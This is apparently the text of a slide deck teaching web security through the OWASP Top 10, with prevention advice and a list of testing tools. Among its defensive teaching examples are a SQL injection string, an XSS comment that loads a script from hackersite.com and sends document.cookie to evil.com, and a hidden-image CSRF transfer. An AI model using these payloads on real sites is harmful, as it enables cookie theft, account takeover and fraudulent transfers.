2. Agenda
• What is web security and why?
• Introduction to OWASP
• OWASP top 10
• OWASP Security testing tools
• General Security testing tools
• Q & A
3. What is web security and why?
• Security of websites, web applications and web services.
• Emergence of Web 2.0
• Intruders exploits vulnerabilities
• Techniques XSS,Sql Injection etc
• Attacker profiles
• Catastrophic security hacks
• Sony Entertainment 2011- 77 million accounts with credit card numbers
• JP Morgan chase 2014 -7.6million account information
• Master Card- 2005 -40 million accounts
• Business risk
• Trust issues
• Overhead costs
• Security checkpoints and techniques
• Early stages of development
4. OWASP(https://www.owasp.org)
• The Open Web Application Security Project (OWASP)
• Non profit organization, open community
• Vulnerabilities, threats, attacks and countermeasures
• Development guide
• https://www.owasp.org/index.php/Projects/OWASP_Development_Guide
• Testing guide
• https://www.owasp.org/images/5/56/OWASP_Testing_Guide_v3.pdf
• Code review guide
• https://www.owasp.org/images/2/2e/OWASP_Code_Review_Guide-V1_1.pdf
• Webgoat sample web application
• https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
• Mailing lists
• https://lists.owasp.org/mailman/listinfo
• Newsletter
• https://www.owasp.org/index.php/Category:OWASP_Newsletter
• Many more…
5. OWASP top 10 (2017)
• Injection
• Broken Authentication and Session Management (XSS)
• Cross Site Scripting (XSS)
• Broken access Control
• Security Misconfiguration
• Sensitive Data Exposure
• Missing Function Level Access Control
• Cross Site Request Forgery (CSRF)
• Using Components with Known Vulnerabilities
• Under protected APIs
6. (#1)-Injection
• Send untrusted data into the system
• Text based attacks
• External,internal parties
• SQL,LDAP,JPQL,Xpath,Nosql
• String query = "SELECT * FROM user_data WHERE lastName='" +
request.getParameter(“lastName") + "'";
• Query HQLQuery = session.createQuery(“FROM user_data WHERE
lastName ='“ + request.getParameter(“lastName") + "'");
• http://example.com/app/userView?lastName=' or '1'='1
7.
8. Preventing Injection
• Avoid dynamic queries
• Parameterized queries
• PreparedStatement,SQLCommand,PDO
• Stored procedures
• Input validation
• Carefully escape especial characters if no api is available
• OWASP Enterprise Security API
• ESAPI.encoder().encodeForSQL( new OracleCodec(), queryparam );
• Use code analysis tools
• https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
9. (#2)-Broken Authentication and Session
Management
• Custom authentication , Session management with flaws
• Credentials not protected with hashing
• Insider attacks
• Credentials can be guessed
• Session id exposed in the url->session fixation
• Session id won’t timeout
• Session ids are not rotated on success logins
• http://website.com/login.php?;jsessionid=
2P0OC2JSNDLPSKHCJUN2JV&d
11. Crack Password Hash
• Dictionary attack
• File containing words, phrases, common passwords
• Brute-force attack
• Tries every possible combination of characters up to a given length.
• Look up table
• Dictionary in a lookup table data structure
• Rainbow table
• High performance lookup
12. User Registration with Salt
• App post the username foo@example.com with
Password pass
• Server generates a random salt r
• Server computes h=H(r|pass)
• Server stores (foo@example.com,hash,r) in DB
13. Simplified login flow
• App Post username foo@example.com and password
Pass
• Server lookup the salt using the user id
• Server compute the hash h’=H(r|’pass’)
• If(foo@example.com,h’) exists in db allow login
20. Preventing broken authentication contd…
• Implement Proper Password Strength Controls
• Password Length >10<128
• Pasword Complexity
• at least 1 uppercase character (A-Z)
• at least 1 lowercase character (a-z)
• at least 1 digit (0-9)
• at least 1 special character (punctuation) — do not forget to treat space as special
characters too
• Not more than 2 identical characters in a row (e.g., 111 not allowed)
21. Preventing broken authentication contd..
• Authentication and Error Messages
• respond with a generic error message
• Incorrect Response Examples
• "Login for User foo: invalid password"
• "Login failed, invalid user ID"
• "Login failed; account disabled"
• "Login failed; this user is not active“
• Correct Response example
• "Login failed; Invalid userID or password"
22. Preventing broken authentication contd..
• Prevent brute force attacks
• Account lock out
• Multifactor authentication
• Logging and Monitoring
• Use of authentication protocols that require no password
• Oauth
• OpenId
• Saml
• Leverage available frameworks and tools
• Apache Shiro
• Spring security
• Owasp esapi
• https://www.owasp.org/index.php/Authentication_Cheat_Sheet
23. Preventing Session Management issues
• Secure login over Https
• Password submitted encrypted
• Immediate redirect to http
• Session id sent in clear text-<Vulnerability
24. Preventing Session Management issues contd..
• User requests HTTP page,response redirects to HTTPS
• 302 Response is HTTP Vulnerability point
25. Preventing Session Management issues contd..
• HSTS –Http Strict Transport Layer security
• Opt-in security control
• Instructs browser upgrade the security for STS
• HSTS forces
• All communications over HTTPS
• No insecure http requests sent from browser
• No option for user to override untrusted certificates
26. Enabling HSTS
• In Apache add below to .htaccess
• # Use HTTP Strict Transport Security to force client to use secure
connections only
Header always set Strict-Transport-Security "max-
age=300; includeSubDomains; “
Max-age =>The time, in seconds, that the browser should remember that this
site is only to be accessed using HTTPS.
includeSubDomains=>If this optional parameter is specified, this rule applies
to all of the site's subdomains as well.
• Can be done in Nginx,IIS etc
27. Preventing Session Management issues
contd..
• HTTP Strict Transport Security (HSTS)
• Cookies
• Secure
• <secure>true</secure>
• HttpOnly
• <http-only>true</http-only>
• Cache-Control: no-cache,no-store
• Pragma: no-cache
• New session ids on consecutive logins
29. (#3)-Cross Site scripting(XSS)
• Text-based attack scripts that exploit the interpreter in the browser.
• The attacker adds the following comment:
• Great price for a great item! Read my review here <script
src="http://hackersite.com/authstealer.js"> </script>.
• Document.location=http://evil.com?id=document.cookie
31. Preventing XSS
• Html escape before inserting untrusted data
• String safe = ESAPI.encoder().encodeForHTML( request.getParameter( "input" ) );
• & --> &
• < --> <
• > --> >
• JavaScript Escape Before Inserting Untrusted Data
• <script>alert('...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...')</script>
• String safe = ESAPI.encoder().encodeForJavaScript( request.getParameter(
"input" ) );
• Css Escape Before Inserting Untrusted Data
• <style>selector { property : ...ESCAPE UNTRUSTED DATA BEFORE PUTTING
HERE...; } </style>
• String safe = ESAPI.encoder().encodeForCss( request.getParameter( "input" ) );
32. Preventing XSS contd…
• URL Escape Before Inserting Untrusted Data
• <a href="http://www.somesite.com?test=...ESCAPE UNTRUSTED DATA BEFORE
PUTTING HERE...">link</a >
• String safe = ESAPI.encoder().encodeForURL( request.getParameter( "input" ) );
• XSS Filters-Block requests with dangerous tags,scripts
• OWASP antisamy project
• HTML and CSS encoding.
• https://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project
• Html sanitizer project
• https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project
• https://github.com/mganss/HtmlSanitizer
• https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Che
at_Sheet
33. (#4)-Broken access Control
• Unprivileged function access
• http://example.com/app/getappInfo
• http://example.com/app/admin_getappInfo
• Unauthorized data access
• htttp://soomebank.com/showacct?id=101
• http://soomebank.com/showacct?id=102
• Prevention
• Access control matrix
• Check access
• Do not assume that users will be unaware of special or hidden URLs or APIs.
• Penetration tests
• Regular audits, code reviews, Automated verification
• Principle of lease privilege
• Principle of defense in depth
• https://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference
• https://www.owasp.org/index.php/Top_10_2007-Failure_to_Restrict_URL_Access
34. (#5)-Security misconfiguration
• Can happen at any level
• Web server
• App server
• Database
• Custom code
• Out of date software
• Unnecessary ports,services
• Error message throws stack trace?
• Framework settings set to secure value?(struts,spring,.net etc)
• Prevention
• Frequent audits
• Deployment process
• Automate configuration validity
• https://www.owasp.org/index.php/Configuration
• https://www.owasp.org/index.php/Error_Handling
• https://www.owasp.org/index.php/Testing_for_configuration_management
• https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)
• https://www.owasp.org/index.php/A10_2004_Insecure_Configuration_Management
35. (#6)-Sensitive data exposure
• Passwords ,credit card numbers etc (transit or rest)
• Not encrypting sensitive data
• Use weak keys and algorithms to encrypt
• SSL not enabled in the entire path
• Prevention measures
• Encrypt sensitive data accurately
• AES-256
• Key encrypting key
• Hardware security modules
• RSA 2048
• Don’t store sensitive data unnecessarily
• Disable caching and auto completion
• https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet
• https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet
• https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
• https://www.owasp.org/index.php/Testing_for_SSL-TLS
36. (#7) -Insufficient Attack Protection
• Inability to detect, prevent, and respond to both manual and automated
attacks
• Attack with OWASP ZAP,SQL map tools(http://sqlmap.org/)
• Manual human attack
• Detect attacks -> OWASP App sensor
• An input a legitimate client can’t generate?
• Unusual usage patterns, repeated requests, spikes?
• Respond to attacks->OWASP App sensor
• Decide whether to automatically block requests,
• IP addresses, or IP ranges.
• Consider disabling or monitoring misbehaving user accounts.
• Patch quickly
40. (#8)-Cross Site Request Forgery
• Attacker trick the victim with urls
• Execute unwanted actions
• Compromise the entire application
• http://example.com/app/transferFunds?amount=1500&destinationAccou
nt=4673243243
• Attacker emails below url to the victim
• <img src="http://example.com/app/transferFunds?
amount=1500&destinationAccount=attackersAcct#“ width="0" height="0"
/>
41. Preventing CSRF
• Include unique token in hiddenfield
• Verify the token on each request
• CSRFGuard
• Reauthenticate
• https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
• http://lists.owasp.org/pipermail/owasp-csrfguard
42. (#9)-Using components with known
vulnerabilities
• Outdated libraries
• Apache CXF Authentication Bypass (2012)
• Call with no identity token => invoke any web service with full permission
• Spring Remote Code Execution(2011/2012)
• Expression Language flow=>Execute arbitrary code on the server
• Struts2 Remote code execution(2017)
• Mishandles file upload
• Content-Type header flow=>Execution of arbitrary code on the server
43. Preventing Using components with known
vulnerabilities
• Identify all components and dependent libraries
• OWASP_Dependency_Check
• https://www.owasp.org/index.php/OWASP_Dependency_Check
• Retire.js
• https://github.com/retirejs/retire.js/
• Monitor security of these components
• Mailing lists
• Official sites
• Security policy on 3rd party libraries
• Software development practices to use
• Passing security tests
• Acceptable licenses
• Wrappers to expose only the required function in an api
• https://cve.mitre.org/about/
• https://www.owasp.org/index.php/Virtual_Patching_Best_Practices
44. (#10)- Underprotected APIs
• REST, JSON, and XML APIs
• Mobile app connecting to remote API(Username,password and accountnum)
• Public SMS JSON API->SQL injection
• XML XXE
• External entity is processed by XML parser
• Prevention
• Secured communications between the client and your APIs.
• Strong authentication scheme for your APIs,
• Parser configuration is hardened against attack.
• Protect against injection of all forms
• https://www.owasp.org/index.php/REST_Security_Cheat_Sheet
• https://www.owasp.org/index.php/Web_Service_Security_Cheat_Sheet
45.
46. OWASP Testing tools
• The OWASP Application Security Verification Standard (ASVS) Project
• Test ,web application technical security controls
• Requirements for secure development.
• Procurement
• https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verificatio
n_Standard_Project
• OWASP live CD project
• Best open source security tools into a single bootable environment
• Boot from this Live CD or run VM
• Access to a full security testing suite
• No configuration required
• OWASP ZAP
• https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools
47. General Security Testing tools
• Iron Wasp(https://ironwasp.org/)
• Over 25 kinds of web vulnerabilities
• Wireshark(https://www.wireshark.org/)
• Network packet analyzer.
• Google Nogotofail( https://github.com/google/nogotofail)
• Known TLS/SSL vulnerabilities and misconfigurations.
• SQlMap( http://sqlmap.org/)
• Sql Injection
• Qualys(https://www.qualys.com)